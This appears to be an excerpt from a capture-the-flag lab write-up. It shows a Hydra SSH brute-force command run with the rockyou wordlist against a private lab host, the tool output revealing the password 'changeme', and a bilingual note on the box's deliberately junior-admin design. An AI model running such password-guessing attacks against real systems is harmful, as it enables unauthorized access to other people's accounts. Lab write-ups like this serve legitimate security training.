$ hydra -l steve -P ~/tools/rockyou.txt ssh://192.168.10.154 -t 64 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-23 10:16:47 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 64 tasks per 1 server, overall 64 tasks, 14344400 login tries (l:1/p:14344400), ~224132 tries per task [DATA] attacking ssh://192.168.10.154:22/
[STATUS] 797.00 tries/min, 797 tries in 00:01h, 14343696 to do in 299:58h, 64 active [STATUS] 583.00 tries/min, 1749 tries in 00:03h, 14342780 to do in 410:02h, 64 active [STATUS] 519.00 tries/min, 3633 tries in 00:07h, 14340896 to do in 460:32h, 64 active [ssh] host: 192.168.10.154 login: steve password: changeme 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 51 final worker threads did not complete until end. [ERROR] 51 targets did not resolve or could not be connected [ERROR] 0 targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-23 10:24:06
As a final item of note, this box is meant as a counter modern capture-the-flag design through the inclusion of services which simply don’t work and with unconventional construction logic through the lens of a younger admin. Careful thought was taken to use commands, instructions, and commit mistakes (i.e. misconfigurations and typos) akin to that which a junior admin would make and use. 最后要注意的是，该盒子通过包含一些根本无法使用的服务以及不合常规的构建逻辑（通过年轻管理员的眼光），成为一种反现代的标志设计。 仔细考虑过使用命令，指令和提交错误（即，错误的配置和错别字），类似于初级管理员会使用和执行的错误。